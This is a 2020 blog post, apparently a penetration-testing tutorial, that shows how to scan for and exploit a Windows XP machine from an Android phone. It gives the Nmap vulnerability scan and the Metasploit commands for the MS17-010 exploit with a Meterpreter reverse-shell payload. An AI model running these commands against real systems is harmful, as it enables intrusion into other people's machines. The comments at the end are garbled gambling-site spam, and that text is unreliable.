See If You Can Find It

Monday, June 15, 2020

Exploit from your phone!

Hey everyone! Hopefully you've been able to avoid the stereotypical dredge of Monday. If not, maybe you'll enjoy what I have for you today!

For all of you penetration tester's out there (or those aspiring to be one), most of the time you want to be as discreet as possible, right? Unless you're performing your engagement in a coffee shop or somewhere else where having your laptop out is the norm, you usually have to wait until after hours to do a lot of the technical work (or have a pretty powerful antenna to connect to their wireless environment). Well today, we're gonna talk about a way you can look like everyone else while engaging your environment. For this attack, we're using an old Windows XP machine (you'd be surprised at how many people still use it, Vladimir Putin does) and a Samsung Galaxy S9. The tools used are: Fing, Termux, Nmap, and Metasploit.



RECON

First, we need to do a scan of the network to find the host IP that we're going to be attacking. For this we're using Fing (check out my previous post HERE if you want to know how to use Fing).

VULNERABILITY IDENTIFICATION

We see there is a host named WinXP at IP 192.168.1.143. Now that we've identified this information, we should scan it with Nmap to see what services are running, and if there are any easy to find vulnerabilities in this system. We're going to do this simple scan by opening up Termux and typing in "nmap -vv -Pn --script vuln 192.168.1.143".
Here we see that this host is vulnerable to CVE-2017-0143  (Eternal Romance).

EXPLOITATION

Now we're going to launch Metasploit using "msfconsole" so that we can get our exploit going.

From here we need to load our exploit, set a payload to use, and specify the IP addresses of the attacking device as well as the victim. Here's the info that I've input here:
"use exploit/windows/smb/ms17_010_psexec"

"set payload windows/meterpreter/reverse_tcp"

"set lhost 192.168.1.137"

"set rhost 192.168.1.143"

Now that this is done, we're ready to exploit!

Success! Now we'll use a couple of commands to verify info about the machine we're on.

There we have it! Just like you were right at your computer, but for all anyone around would know, you're just scrolling through social media on your phone. Now, you may notice that my keyboard is different than the standard Samsung keyboard, that's because for a while now there has been a bug in the Samsung keyboard that causes letters typed to not show up in certain fields (Termux and Spotify are the two biggest problems with this). Here I'm using "Hacker's Keyboard" from the NetHunter Store.

3 comments:

  1. Vr video games - YouTube
    Vr video youtube to mp3 games. The more money you make on a game, the better. The more you win. The higher the rate of bonuses. The

    ReplyDelete
  2. The Casino Review for 2021
    The Casino has been 해외 배팅 사이트 running since 2007 and 1xbet 후기 continues to provide 야구분석 a reliable and enjoyable experience for punters. The range of slots, poker, roulette, and live dealer  강원 랜드 칩걸 Rating: 4 · ‎Review by golden star CasinoSites.one

    ReplyDelete
  3. A computerized version of a traditional slot machine, video slots have a tendency to include particular theming parts, corresponding to themed symbols, nicely as|in addition to} bonus video games and extra methods to win. When these wins turn out to be etched on your brain, your Dopamine reward system is extra doubtless to|prone to} be activated everytime you consider slot machines. This helps to maintain even the most casual 온라인 바카라 of gamblers excited about slots for a long time|for a very lengthy time}, potentially even years after spinning the reels. With over 1,200 slot and video poker machines select from|to choose from}, you will discover a full selection of your favourite video games. Mandalay Bay presents a variety of|quite so much of|a big selection of} video games, starting from $0.01 to $100.00. Once may have} made your decisions and the selections are revealed, all the other symbols could also be} revealed as well - often with a better choice than the ones you picked.

    ReplyDelete